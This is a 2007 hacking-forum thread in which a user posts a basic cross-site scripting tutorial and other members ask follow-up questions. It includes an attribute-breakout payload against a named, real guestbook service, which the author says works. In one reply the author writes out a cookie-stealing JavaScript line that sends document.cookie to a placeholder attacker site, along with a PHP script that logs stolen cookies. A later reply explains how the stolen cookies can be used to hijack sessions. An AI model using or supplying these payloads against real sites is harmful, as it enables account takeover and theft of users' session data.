Basic XSS (Cross Site Scripting)

Docs that have proven to be a staple in understanding computer/network security. This is not an inclusive forum and nothing ipublished will tell you how to 0wn someone, these docs will help you understand how you got 0wnd.
Post Reply
User avatar
fromint
n00b
Posts: 20
Joined: Sun Jun 03, 2007 3:09 pm
Location: Arizona

Basic XSS (Cross Site Scripting)

Post by fromint » Sun Jun 03, 2007 6:07 pm

Basic XSS, by fromint.
Helpful knowledge: HTML, Javascript


1. What is XSS?

XSS, or (Cross Site Scripting), in layman's terms, is basically summed up as sending code snippets through URLs, Guest Books, Forums, Message Boards, and other means of web interaction. XSS has become perhaps one of the #1 problems for a lot of major web sites.

2. Why?

One of the main reasons to use XSS is for people to force others to their site. By a simple javascript command, inserted correctly, I can (not here of course, but on exploitable forums) send a user directly to http://www.google.com.

Code: Select all

<script language="javascript">
location.href="http://www.google.com"
</script>
Usually, when people do this, they redirect people to their cookie stealer, so they can perhaps gain access to their account, or find out other personal information. Most little script kiddies, though, will make some annoying alert boxes, or popup porn websites.

3. How?

XSS is most commonly used in guestbooks. The most vulnerable guestbooks, that contain no filtering, usually don't have any sensitive information that you need a user's cookie for. These unprotected guestbooks are simply practiced on. For example, if I inserted this raw section of javascript into an unfiltered guestbook, I would recieve a popup box saying "XSS".

Code: Select all

<script language="javascript">
alert('XSS');
</script>
For more commercial guestbooks and forums, like Xanga and Myspace, this code would have to be drastically manipulated to be executed.

4. Real Example

I found an XSS exploit in a quite popular guestbook, the HTML Gear guestbook by Lycos. This guestbook is pretty tightly filtered in the comment section so I tried elsewhere. In the below picture you see a text box that is marked "Homepage URL". Apparently, whatever you type in here is placed into an HTML code for a link: <a href="What you entered in textbox">What you entered in textbox</a>. Now, if I put a single quote ( " ) in my entry, the link would contain whatever I entered before it in the text box, because the single quote would end the value for the <a href> tag. That means, whatever I put after the single quote, could be used a javascript command in the <a href> tag. For this tutorial, I will use the "OnMouseOver" javascript event handler. But, in reality, it's really up to you for what event handler you decide to use. After the OnMouseOver event handler, I'm going to have a simple alert box pop up saying "XSS". For this I would use alert('XSS'). So, for my entire entry, I would put:

Code: Select all

http://www.google.com" OnMouseOver="alert('XSS')
When that code is put into my guestbook entry, it fits nicely into the <a href> tag, as shown in the picture below. Go ahead, try it. Everytime you roll over the link it pops up an XSS alert box. NOTE: IN THE PICTURES, I DID NOT SUBMIT THE ENTRY, BECAUSE THESE CAN GET YOU IN TROUBLE. LYCOS MOST LIKELY LOGS IP'S. Feel free to experiment on your own, but remember that I am not recommending to do anything stupid, annoying (refer to script kiddies), or malicious. Have fun.



Image



Image



Image



Image





~ fromint (Exploit works as of 6-03-07)
LmAo! My gamer just pwned ur honor student!

User avatar
lonestar3457
Corporal
Posts: 125
Joined: Fri Dec 29, 2006 9:01 pm
Location: CMOS Batt,NY
Contact:

Post by lonestar3457 » Sun Jun 03, 2007 6:38 pm

nice tut..You're new hear aren't you... Good job. Keep it up. I've always wanted to learn alternative methods to web based scripting, because HT is just getting really boring.
Just my two sense.

User avatar
lonestar3457
Corporal
Posts: 125
Joined: Fri Dec 29, 2006 9:01 pm
Location: CMOS Batt,NY
Contact:

Post by lonestar3457 » Sun Jun 03, 2007 6:42 pm

i got a question for you..say if you were to make a site,such as a javascripted site or a html or xss or whatever with input boxes, how would you get that information that the person has imputed into those fields to your possession? You would need some sort of server right? Thats where im stuck at. I'm kind of lost on how to set up one, providing that i only have one computer.
Just my two sense.

User avatar
fromint
n00b
Posts: 20
Joined: Sun Jun 03, 2007 3:09 pm
Location: Arizona

Post by fromint » Sun Jun 03, 2007 7:31 pm

First of all, you need ANY kind of server to put your site on the web. XSS isn't language, it's just an acronym for Cross Site Scripting, therefor you couldn't write a webpage with it. And no, you don't necesarily need a server with cgi/php/perl/etc (geocities). If I remember correctly, you can have a javascript file write it to a text file, even though its not secure at all. If you have a server that supports php or other similarly functioning language (not geocities), you can do (in php for example) a simple $_GET["text field name here"] and have that be written to database. So basically, if you don't care about security, go with a javascript file. If you want security, find a PHP supporting host (try googling "xlphp") and make the site there.
LmAo! My gamer just pwned ur honor student!

User avatar
Fishbones
Tough Luck ;-)
Posts: 644
Joined: Thu May 24, 2007 2:27 pm
Location: Unknown
Contact:

Post by Fishbones » Sun Jun 03, 2007 8:21 pm

Would it be possible to code a Cookie Stealer into a myspace message?
46 69 73 68 62 6f 6e 65 73

Patience is not a virtue, but a discipline.
-Fishbones

User avatar
fromint
n00b
Posts: 20
Joined: Sun Jun 03, 2007 3:09 pm
Location: Arizona

Post by fromint » Sun Jun 03, 2007 8:34 pm

You wouldn't code the cookie stealer INTO the page, you send a bit of javascript, like this:

Code: Select all

<img src=javascript:location.href="http://www.yoursite.com/index.php?cookie="+document.cookie></img>
This wouldn't work on Myspace, because it has really good filters. This would directly send the user to your page, which is a cookie stealer PHP script. The index.php might look something like this:

Code: Select all

<?php
$cookie = $HTTP_GET_VARS["cookie"];
$file = fopen('cookies.txt', 'a');
fwrite($file, $cookie . "\n\n");
?>
If you look at the and of the javascript code (the very first code), you see that the cookie variable is defined as "document.cookie", which means whatever the particular viewing users cookie is. Then look at the PHP code, see that it takes the "cookie" variable (document.cookie) and writes it to the text file called cookies.txt. Thats pretty much it.
LmAo! My gamer just pwned ur honor student!

PAPA SMURF
n00b
Posts: 16
Joined: Tue Aug 14, 2007 4:14 pm

Post by PAPA SMURF » Sun Dec 16, 2007 7:24 pm

so if you got someone redirected to your cookie stealer it could steal someones say ebay account or myspace account passwords?
Three wrongs make a right

User avatar
IceDane
Because I Can
Posts: 2652
Joined: Wed May 12, 2004 9:25 am

Post by IceDane » Sun Dec 16, 2007 7:30 pm

PAPA SMURF wrote:so if you got someone redirected to your cookie stealer it could steal someones say ebay account or myspace account passwords?
Not entirely. However, some sites make use of cookies to know if you ticked the 'Stay logged in' box. If you retrieve the cookies, you can go to the site and you'll be logged in as the user in question. This is however only if you're lucky. Most use some sort of a security mechanism aside from cookies to make sure that the session isn't being hijacked.

(PS: Look up PHP session hijacking, too)

User avatar
mardagz
n00b
Posts: 1
Joined: Fri Aug 07, 2009 8:26 pm

Re: Basic XSS (Cross Site Scripting)

Post by mardagz » Thu Sep 30, 2010 1:31 am


User avatar
Thor
htd0rg lieutenant
Posts: 440
Joined: Tue Dec 18, 2007 9:39 am
Location: Location Location

Re: Basic XSS (Cross Site Scripting)

Post by Thor » Thu Sep 30, 2010 7:08 pm

GTFO with that bullshit...

User avatar
narada
Hacker in Training
Posts: 92
Joined: Sat Apr 25, 2009 10:05 am

Re: Basic XSS (Cross Site Scripting)

Post by narada » Thu Sep 30, 2010 8:01 pm

lawl, this guy again.

User avatar
Thor
htd0rg lieutenant
Posts: 440
Joined: Tue Dec 18, 2007 9:39 am
Location: Location Location

Re: Basic XSS (Cross Site Scripting)

Post by Thor » Fri Oct 01, 2010 9:10 pm

narada wrote:lawl, this guy again.
me?

User avatar
narada
Hacker in Training
Posts: 92
Joined: Sat Apr 25, 2009 10:05 am

Re: Basic XSS (Cross Site Scripting)

Post by narada » Sun Oct 03, 2010 1:13 am

Thor wrote:
narada wrote:lawl, this guy again.
me?
Nah. mardagz was spamming this stuff in #hackerthreads too.

User avatar
Thor
htd0rg lieutenant
Posts: 440
Joined: Tue Dec 18, 2007 9:39 am
Location: Location Location

Re: Basic XSS (Cross Site Scripting)

Post by Thor » Sat Oct 09, 2010 2:29 am

##Nuclear Missle Deployment Status: Cancelled##

oh, lol.

irramKege
n00b
Posts: 1
Joined: Tue Jul 05, 2011 8:21 am

Post by irramKege » Tue Jul 05, 2011 8:22 am

You will not prompt to me, where to me to learn more about it?

Post Reply